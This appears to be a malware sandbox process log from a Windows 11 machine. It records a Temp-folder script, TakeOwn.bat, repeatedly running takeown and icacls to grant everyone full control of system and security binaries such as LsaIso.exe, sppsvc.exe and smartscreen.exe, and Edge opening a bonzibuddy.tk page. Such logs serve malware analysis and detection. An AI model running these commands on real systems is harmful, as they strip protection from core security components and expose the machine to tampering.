icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..rity-spp-validation_31bf3856ad364e35_10.0.22000.176_none_161fead9a85c45cd\f\GenValObj.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..sktop.appxmain.root_31bf3856ad364e35_10.0.22000.120_none_c4a02f7c0324c157\f\SearchApp.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..sktop.appxmain.root_31bf3856ad364e35_10.0.22000.120_none_c4a02f7c0324c157\f\SearchApp.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..sktop.appxmain.root_31bf3856ad364e35_10.0.22000.120_none_c4a02f7c0324c157\f\SearchApp.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_9c5aa041b6a59db2\f\RMActivate.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_9c5aa041b6a59db2\f\RMActivate.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_9c5aa041b6a59db2\f\RMActivate.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-scripting_31bf3856ad364e35_10.0.22000.194_none_4385d5a885bc9a36\f\cscript.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-scripting_31bf3856ad364e35_10.0.22000.194_none_4385d5a885bc9a36\f\cscript.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-scripting_31bf3856ad364e35_10.0.22000.194_none_4385d5a885bc9a36\f\cscript.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-scripting_31bf3856ad364e35_10.0.22000.194_none_4385d5a885bc9a36\f\wscript.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-scripting_31bf3856ad364e35_10.0.22000.194_none_4385d5a885bc9a36\f\wscript.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-scripting_31bf3856ad364e35_10.0.22000.194_none_4385d5a885bc9a36\f\wscript.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-securestartup-service_31bf3856ad364e35_10.0.22000.41_none_46e53612c0e92204\f\BdeUISrv.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-securestartup-service_31bf3856ad364e35_10.0.22000.41_none_46e53612c0e92204\f\BdeUISrv.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-securestartup-service_31bf3856ad364e35_10.0.22000.41_none_46e53612c0e92204\f\BdeUISrv.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-lsatrustlet_31bf3856ad364e35_10.0.22000.434_none_dff7d1ca03eba43a\f\LsaIso.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-lsatrustlet_31bf3856ad364e35_10.0.22000.434_none_dff7d1ca03eba43a\f\LsaIso.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-lsatrustlet_31bf3856ad364e35_10.0.22000.434_none_dff7d1ca03eba43a\f\LsaIso.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-spp-extcom_31bf3856ad364e35_10.0.22000.318_none_065139dac533d14e\f\SppExtComObj.Exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-spp-extcom_31bf3856ad364e35_10.0.22000.318_none_065139dac533d14e\f\SppExtComObj.Exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-spp-extcom_31bf3856ad364e35_10.0.22000.318_none_065139dac533d14e\f\SppExtComObj.Exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-spp-ux_31bf3856ad364e35_10.0.22000.348_none_571935de2408ae28\f\slui.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-spp-ux_31bf3856ad364e35_10.0.22000.348_none_571935de2408ae28\f\slui.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-spp-ux_31bf3856ad364e35_10.0.22000.348_none_571935de2408ae28\f\slui.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-spp_31bf3856ad364e35_10.0.22000.493_none_157ddf72a65679bf\f\sppsvc.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-spp_31bf3856ad364e35_10.0.22000.493_none_157ddf72a65679bf\f\sppsvc.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-spp_31bf3856ad364e35_10.0.22000.493_none_157ddf72a65679bf\f\sppsvc.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-tokenbroker_31bf3856ad364e35_10.0.22000.282_none_9ed8cb052ff869e6\f\TokenBrokerCookies.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-tokenbroker_31bf3856ad364e35_10.0.22000.282_none_9ed8cb052ff869e6\f\TokenBrokerCookies.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-tokenbroker_31bf3856ad364e35_10.0.22000.282_none_9ed8cb052ff869e6\f\TokenBrokerCookies.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-tools-klist_31bf3856ad364e35_10.0.22000.282_none_3c5af3814be830ab\f\klist.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-tools-klist_31bf3856ad364e35_10.0.22000.282_none_3c5af3814be830ab\f\klist.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-tools-klist_31bf3856ad364e35_10.0.22000.282_none_3c5af3814be830ab\f\klist.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-tools-ksetup_31bf3856ad364e35_10.0.22000.434_none_17cb2e5ad35a58c9\f\ksetup.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-tools-ksetup_31bf3856ad364e35_10.0.22000.434_none_17cb2e5ad35a58c9\f\ksetup.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-tools-ksetup_31bf3856ad364e35_10.0.22000.434_none_17cb2e5ad35a58c9\f\ksetup.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-tools-nltest_31bf3856ad364e35_10.0.22000.434_none_95bd8d59818abcd7\f\nltest.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-tools-nltest_31bf3856ad364e35_10.0.22000.434_none_95bd8d59818abcd7\f\nltest.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-tools-nltest_31bf3856ad364e35_10.0.22000.434_none_95bd8d59818abcd7\f\nltest.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\f\audit.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://bonzibuddy.tk/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffe6b0a3cb8,0x7ffe6b0a3cc8,0x7ffe6b0a3cd8
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\f\audit.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\f\audit.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\f\AuditShD.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\f\AuditShD.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\f\AuditShD.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\f\Setup.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\f\Setup.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\f\Setup.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-setup360-media-base_31bf3856ad364e35_10.0.22000.469_none_259c259bf9e2d267\f\SetupHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-setup360-media-base_31bf3856ad364e35_10.0.22000.469_none_259c259bf9e2d267\f\SetupHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-setup360-media-base_31bf3856ad364e35_10.0.22000.469_none_259c259bf9e2d267\f\SetupHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-setup360-media-base_31bf3856ad364e35_10.0.22000.469_none_259c259bf9e2d267\f\SetupPrep.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-setup360-media-base_31bf3856ad364e35_10.0.22000.469_none_259c259bf9e2d267\f\SetupPrep.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-setup360-media-base_31bf3856ad364e35_10.0.22000.469_none_259c259bf9e2d267\f\SetupPrep.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.469_none_3038532b4b83a565\f\wowreg32.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,6382627284399283174,17416505605261007163,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1804 /prefetch:2
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,6382627284399283174,17416505605261007163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,6382627284399283174,17416505605261007163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,6382627284399283174,17416505605261007163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,6382627284399283174,17416505605261007163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.469_none_3038532b4b83a565\f\wowreg32.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.469_none_3038532b4b83a565\f\wowreg32.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-shell-customshellhost_31bf3856ad364e35_10.0.22000.469_none_83da02152447c976\f\CustomShellHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-shell-customshellhost_31bf3856ad364e35_10.0.22000.469_none_83da02152447c976\f\CustomShellHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-shell-customshellhost_31bf3856ad364e35_10.0.22000.469_none_83da02152447c976\f\CustomShellHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-shell-oneoffs-em_31bf3856ad364e35_10.0.22000.318_none_ed2b4c25cc173a5f\n\EM.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-shell-oneoffs-em_31bf3856ad364e35_10.0.22000.318_none_ed2b4c25cc173a5f\n\EM.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-shell-oneoffs-em_31bf3856ad364e35_10.0.22000.318_none_ed2b4c25cc173a5f\n\EM.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-shell-shellappruntime_31bf3856ad364e35_10.0.22000.469_none_0defc0f5807dd5f0\f\ShellAppRuntime.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-shell-shellappruntime_31bf3856ad364e35_10.0.22000.469_none_0defc0f5807dd5f0\f\ShellAppRuntime.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-shell-shellappruntime_31bf3856ad364e35_10.0.22000.469_none_0defc0f5807dd5f0\f\ShellAppRuntime.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-smartscreen_31bf3856ad364e35_10.0.22000.65_none_9f7612893c144c09\f\smartscreen.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-smartscreen_31bf3856ad364e35_10.0.22000.65_none_9f7612893c144c09\f\smartscreen.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-smartscreen_31bf3856ad364e35_10.0.22000.65_none_9f7612893c144c09\f\smartscreen.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-spectrum_31bf3856ad364e35_10.0.22000.65_none_5df9e0d1a9b3658b\f\Spectrum.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-spectrum_31bf3856ad364e35_10.0.22000.65_none_5df9e0d1a9b3658b\f\Spectrum.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-spectrum_31bf3856ad364e35_10.0.22000.65_none_5df9e0d1a9b3658b\f\Spectrum.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-starttiledata_31bf3856ad364e35_10.0.22000.348_none_8c1cd5f65f938380\f\DataStoreCacheDumpTool.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-starttiledata_31bf3856ad364e35_10.0.22000.348_none_8c1cd5f65f938380\f\DataStoreCacheDumpTool.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-starttiledata_31bf3856ad364e35_10.0.22000.348_none_8c1cd5f65f938380\f\DataStoreCacheDumpTool.exe" /grant "everyone":(f)
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,6382627284399283174,17416505605261007163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-sysreset_31bf3856ad364e35_10.0.22000.469_none_3765148c03bcc3ce\f\ResetEngine.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-sysreset_31bf3856ad364e35_10.0.22000.469_none_3765148c03bcc3ce\f\ResetEngine.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-sysreset_31bf3856ad364e35_10.0.22000.469_none_3765148c03bcc3ce\f\ResetEngine.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
